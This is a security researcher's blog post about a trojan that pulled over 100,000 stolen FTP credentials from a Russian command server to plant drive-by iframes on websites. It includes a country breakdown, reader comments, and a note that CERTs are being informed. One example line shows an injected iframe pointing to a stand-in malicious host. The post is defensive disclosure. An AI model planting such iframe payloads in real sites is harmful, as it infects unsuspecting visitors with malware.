More than 100′000 stolen FTP credentials retrieved

A month ago I found a pretty interesting trojan in my honeypots. In an initial analysis it contacted a server in Russia, and a closer look revealed around 150, sometimes even 200, simultaneous sessions between this server and many different, probably infected, clients. Obviously I was facing quite a large-scaled command and control server (C&C) designed to serve thousands of infected systems in order to keep a bunch of different kinds of malware running. An in depth examination of the data flowing between my honeypots and this C&C suggested that the infected client received usernames and passwords for compromised FTP accounts around the world from the C&C. The origin of those credentials can only be speculated about, but keyloggers or trade in specialized criminal markets for this kind of information would be plausible explanations. Subsequently the infected clients used the supplied credentials in order to log into the affected FTP accounts and recursively scanned for typical filenames appearing on websites (like index.html). Of course not all of those accounts are actually related to websites, but a considerable part of it actually is. Suitable filenames, if found, are modified in a subtle way such that unsuspecting visitors of those websites using browsers with unpatched vulnerabilities would be infected by malware without requiring any additional action by the users. This kind of infection is called a DriveBy infection, because users can be infected by simply accessing a website (hence “drive-by”). While the old-fashioned method of sending spam mails with malicious attachments becomes more and more ineffective, DriveBy infections are increasingly posing the method of choice.

Until now it was possible to collect more than 100′000 unique FTP credentials from the Russian C&C server.

Here is a short illustration how the criminal process works:

  1. Heya! Feed me Seymour, I want FTP credentials!
  2. Here you have some FTP credentials:
    Username: User
    Password: stupidpassword
  3. Our zombie tries to login using the supplied FTP credentials.
  4. If the login is successful,
  5. He tries to inject malicious code (iframes) into a one or more .html files that already exist on the victim server, eg:
    < iframe src=evilserver.tld/getexploits.php border=0 >
  6. An unsuspecting user (“poor-guy”) visits; he trusts this site because he used it many times before and never experienced any problems.
  7. Poor-guy gets back the normal webcontent as usual, but this time “enriched” with an invisible iframe that points to the malicious domain evilserver.tld.
  8. The browser of poor-guy is now downloading the script getexploits.php on evilserver.tld…
  9. But this script getexploits.php is malicious and tries to exploit several well known vulnerabilities in the browser or in installed plugins of poor-guy…
    If any of those attacks is successful, the browser of poor-guy will download a trojan from evilserver.tld which turns his computer into another zombie.This zombie can now watch poor-guy’s actions, steal his bank accounts, or install other drive-by infections as in step 1 – the zombie is under control of the attacker.

Cycle 1: Drive-By setup cycle
Cycle 2: Drive-By exploit cycle

Let’s have a closer look at these FTP credentials. Currently there are “only” around 150 credentials related to Swiss Internet service providers (ISPs) – among others a Swiss university, a website of a cantonal (state) administration, and a couple of international organisations with offices registered in Switzerland.

The Swiss Reporting and Analysis Centre for Information Assurance (MELANI) contacted most of the more important owners meanwhile – contacting all of them will take more time due to their very limited resources. An extended look at the affected accounts worldwide is much scarier though, as credentials from space centres, banks, universities, TV channels and political parties show up.

The table below gives you a short summary of the fifteen countries with the largest number of captured credentials:

Rank Country # of credentials in %
1 US United Staates 33’033 29.48
2 RU Russia 19’464 17.37
3 UNKNOWN UNKNOWN 16’209 14.47
4 TR Turkey 4’210 3.76
5 DE Germany 4’153 3.71
6 HU Hungary 3’787 3.38
7 AU Australia 3’318 2.96
8 UA Ukraine 2’895 2.58
9 CZ Czech Republic 2’568 2.29
10 TH Thailand 1’967 1.76
11 IN India 1’951 1.74
12 PL Poland 1’927 1.72
13 CA Canada 1’737 1.55
14 GB United Kingdom 1’643 1.47
15 FR France 1’562 1.39
other 11’618 10.37

As you can see, nearly 30% of the retrieved credentials concerns US ISPs.
Note: UNKNOWN are mostly credentials from private addresses in local area networks (LAN) like 192.168.x.x etc.

Currently I’m working together with the Swiss Reporting and Analysis Centre for Information Assurance (MELANI) and the US CERT Coordination Center (CERT/CC) to inform the relevant authorities in affected countries, preferably national CERTs, as far as this is possible given the dimension of the problem. Most European countries are already informed.

Last but not least I would like to express special thanks to MELANI / and the US CERT/CC who were supporting me since I work on that case. Thank you very much! You guys do a great job!

If you have any question please use the contact form.

5 thoughts on “More than 100′000 stolen FTP credentials retrieved

  1. Daniel Sulzer

    Ich möchte hiermit nicht über die Verbreiter von Malware fluchen, das bringt ja sowieso nichts. Ich möchte mich vielmehr beim Autor bedanken. Die Gesellschaft über potentielle Gefahren zu informieren ist eine hervorragende Dienstleistung und ein probates Mittel gegen die Verbreitung von Malware.

    Vielen Dank

  2. pascal

    Nice blogs,

    i think the most stupid is not the a stupid passwords, but the FTP protocol !
    FTP is vulnerable on force attack … same with a complex password … take a liitle more time … but now with the new processor muti core, …

    Don’t use if it’s possible FTP !!! or active only if necessary for a time defined.
    LOG the traffic on ftp … on the firewall



  3. Pingback: 15 Countries most affected by security honeypots

  4. Richard Garrison

    Yeah the other day someone hacked my ftp account and used it to upload “adult” material and warez. My account for that website got banned by my webhost and I was so mad.

    Never use evil FTP if you can help it.

  5. Pingback: Fälschungen von YouTube & Co - die Fata Morganas des Internets |

Leave a Reply

Your email address will not be published. Required fields are marked *